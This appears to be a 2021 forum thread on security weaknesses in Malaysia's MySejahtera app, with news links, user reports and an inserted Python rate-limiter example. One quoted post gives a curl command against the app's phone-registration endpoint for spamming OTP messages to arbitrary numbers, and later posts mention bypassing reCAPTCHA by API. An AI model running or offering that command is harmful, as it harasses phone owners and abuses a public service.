
 MySejahtera Not So Sejahtera, Full of Exploits

kidmad
post Oct 19 2021, 08:47 AM

Look at all my stars!!
*******
Senior Member
4,370 posts

Joined: Jul 2005
QUOTE(Darkripper @ Oct 18 2021, 11:13 PM)
you're talking about their backend implementation, which is out-of-reach. Client trigger mysejahtera, which in turn they forward it to provider. It doesn't matter how the backend is implemented if they open their doors wide open.
*
The way you put it, there is something very wrong with the app design. The request should trigger a notification and queue the request somewhere instead of the client calling the service immediately. Anyway, 0 marks to the application design in this case.
PzGman
post Oct 19 2021, 08:55 AM

Private Pilot
*****
Junior Member
800 posts

Joined: Jun 2012
From: Petaling Jaya


no offense but that app is crap lol
God Grid
post Oct 19 2021, 10:37 AM

New Member
*
Junior Member
29 posts

Joined: Aug 2021
QUOTE(Darkripper @ Oct 19 2021, 02:51 AM)
jquery is top go-to library when everyone is manually manipulating HTML elements for frontend, it is easier to use than vanilla JS.  It is not bad, just it is not that relevant anymore.

Then SPA like Angular, React comes along, which is easier to code, a little bit more structured and efficient. The best thing about SPA is there is less page refresh, providing a better UX.

Now you even have Vue, Svelte, SolidJS which is trying to overtake React.

It's not just for UI, but for the client side, aka the frontend, to render and do whatever it needs to (communicate with the server, run a service worker for background work).
*
Yeah, jQuery has been around for more than 10 years? 20 years? But it has Ajax, hahaha.

I only used Vue for its UI, like Vuetify.

Now it's all about single page applications. Everything click click click, no idea if it's going to the next page or previous page or anything.
deejay_krish
post Oct 19 2021, 10:48 AM

You're Just Another Part Of Me
*****
Senior Member
948 posts

Joined: Jul 2005
From: Neverland
So-called 70mil
WaCKy-Angel
post Oct 20 2021, 11:52 AM

PeACe~~
*********
All Stars
21,509 posts

Joined: Dec 2004
From: KL



QUOTE(Darkripper @ Oct 18 2021, 01:51 PM)
You can instruct "MySejahtera" to spam OTP to others at will. Just run the following code at the terminal of your choice and change the contact number (Windows users, adjust it yourselves)

CODE
curl --location --request POST 'https://mysejahtera.malaysia.gov.my/checkin/registerPhone' \
--form 'countryCode="60"' \
--form 'contactNumber="12345678"'

*
https://www.malaymail.com/news/malaysia/202...res-why/2014651

Your doing? lol
kons
post Oct 20 2021, 12:06 PM

Конс
Group Icon
Moderator
6,142 posts

Joined: Oct 2004



QUOTE(WaCKy-Angel @ Oct 20 2021, 11:52 AM)
Yeah, someone spammed my number with SJ OTPs and I sent the screenshot to their helpdesk.
diffyhelman2
post Oct 20 2021, 01:19 PM

Enthusiast
*****
Junior Member
807 posts

Joined: Apr 2019
QUOTE(WaCKy-Angel @ Oct 20 2021, 11:52 AM)
LOL, beat me to it:

https://www.freemalaysiatoday.com/category/...ys-mysejahtera/
C-Fu
post Oct 20 2021, 01:38 PM

Ninja-Fu
******
Senior Member
1,051 posts

Joined: Apr 2005
From: Brisbane, QLD, Ostolia



QUOTE(Darkripper @ Oct 18 2021, 02:27 PM)
They can't do that, as that's the endpoint that the client side is calling to trigger it. Easiest way is just to rate limit + some kind of Captcha. That would reduce the exposure to an acceptable limit.
It won't solve all, but it reduces the exposure.
*
Seems like there's a captcha now.
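The mitigation Darkripper suggests above (rate limiting the OTP endpoint, with a captcha on top) can be shown concretely. The block below is an added example, not MySejahtera's code: a sliding-window limiter that caps OTP sends per target number and per requesting source, with a short cooldown between sends to one number. Class name, limits and the replayed requests are constructed assumptions.

```python
# Added example (not MySejahtera's code): sliding-window OTP rate limiter
# for a registerPhone-style endpoint. Limits and sample data are assumptions.
from collections import defaultdict, deque


class OtpRateLimiter:
    """Allow an OTP send only if neither the target number nor the
    requesting source (e.g. client IP) has used up its window quota."""

    def __init__(self, per_number=3, per_source=10, window_s=600,
                 cooldown_s=60):
        self.per_number, self.per_source = per_number, per_source
        self.window_s, self.cooldown_s = window_s, cooldown_s
        self._by_number = defaultdict(deque)   # key -> send timestamps
        self._by_source = defaultdict(deque)

    def _prune(self, q, now):
        # Drop timestamps that fell out of the sliding window.
        while q and now - q[0] > self.window_s:
            q.popleft()

    def allow(self, country_code, number, source, now):
        """Return (allowed, reason); `now` is a unix timestamp in seconds."""
        key = f"+{country_code}{number}"
        nq, sq = self._by_number[key], self._by_source[source]
        self._prune(nq, now)
        self._prune(sq, now)
        if nq and now - nq[-1] < self.cooldown_s:
            return False, "cooldown"        # too soon after last send
        if len(nq) >= self.per_number:
            return False, "number-quota"    # number is being hammered
        if len(sq) >= self.per_source:
            return False, "source-quota"    # one source, many numbers
        nq.append(now)
        sq.append(now)
        return True, "ok"


def simulate(requests, limiter):
    """Replay constructed (ts, country, number, source) tuples; return reasons."""
    return [limiter.allow(c, n, s, t)[1] for t, c, n, s in requests]


# Constructed replay: one source (203.0.113.7) targets one number repeatedly,
# then cycles through other numbers once the per-number quota is exhausted.
REPLAY = [
    (0, "60", "12345678", "203.0.113.7"), (30, "60", "12345678", "203.0.113.7"),
    (100, "60", "12345678", "203.0.113.7"), (200, "60", "12345678", "203.0.113.7"),
    (300, "60", "12345678", "203.0.113.7"), (310, "60", "87654321", "203.0.113.7"),
    (400, "60", "11112222", "203.0.113.7"), (500, "60", "33334444", "203.0.113.7"),
]
```

Denied requests are not recorded, so a blocked burst cannot extend its own lockout; a captcha check would sit in front of `allow` for the source-quota case.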
klangboy83
post Oct 20 2021, 03:01 PM

Casual
***
Junior Member
438 posts

Joined: Apr 2007
5 Unicorns by 2025
flexyx
post Oct 20 2021, 03:04 PM

Getting Started
**
Junior Member
225 posts

Joined: Jun 2009

No longer works.
Hobbez
post Oct 20 2021, 03:09 PM

Casual
***
Junior Member
365 posts

Joined: Dec 2009
Does anyone think it can send your data to any third parties?

I don't even want to go there....


brkli
post Oct 20 2021, 04:05 PM

On my way
****
Junior Member
539 posts

Joined: Oct 2018
Poor TS...
ye0073
post Oct 20 2021, 04:08 PM

Casual
***
Junior Member
344 posts

Joined: Sep 2004
Someone is using the TS's code and spamming already.
Need to report to the police.
TSDarkripper
post Oct 20 2021, 04:46 PM

What do you expect?
******
Senior Member
1,257 posts

Joined: Dec 2008
From: /k/
QUOTE(brkli @ Oct 20 2021, 04:05 PM)
Poor TS...
*
What?
PJng
post Oct 20 2021, 06:14 PM

10k Club
********
All Stars
10,531 posts

Joined: Oct 2017


TS, you are on the front line news

https://www.lowyat.net/2021/256199/mysejaht...-spam-api-weak/
IamNOT
post Oct 21 2021, 10:40 AM

Getting Started
**
Junior Member
274 posts

Joined: Aug 2008
From: Malacca


Fxxk... Changing the email/phone number does not require verification from the old email/phone number..... Security 404... Using a throwaway email is also useless...
TSDarkripper
post Oct 21 2021, 02:57 PM

What do you expect?
******
Senior Member
1,257 posts

Joined: Dec 2008
From: /k/
QUOTE(IamNOT @ Oct 21 2021, 10:40 AM)
Fxxk... Changing the email/phone number does not require verification from the old email/phone number..... Security 404... Using a throwaway email is also useless...
*
Aiya, they say it's a feature that got exposed. lel... *FEATURE*.

Btw they haven't fixed it yet either, just added reCAPTCHA, which can also be solved using an API.
emburrar
post Oct 21 2021, 02:58 PM

New Member
*
Newbie
14 posts

Joined: Oct 2014
From: Bandar Damai dan Indah


Snake KJ answered
filage
post Dec 25 2021, 10:38 AM

Regular
******
Senior Member
1,205 posts

Joined: Aug 2014
Is there any way to make MySejahtera load faster? Even just showing the fully vaccinated page takes a good 10-15 seconds to load; is there any workaround to make it faster?
PJng
post Dec 25 2021, 11:04 AM

10k Club
********
All Stars
10,531 posts

Joined: Oct 2017


QUOTE(filage @ Dec 25 2021, 10:38 AM)
Is there any way to make MySejahtera load faster? Even just showing the fully vaccinated page takes a good 10-15 seconds to load; is there any workaround to make it faster?
*
Turn off data, it's faster.
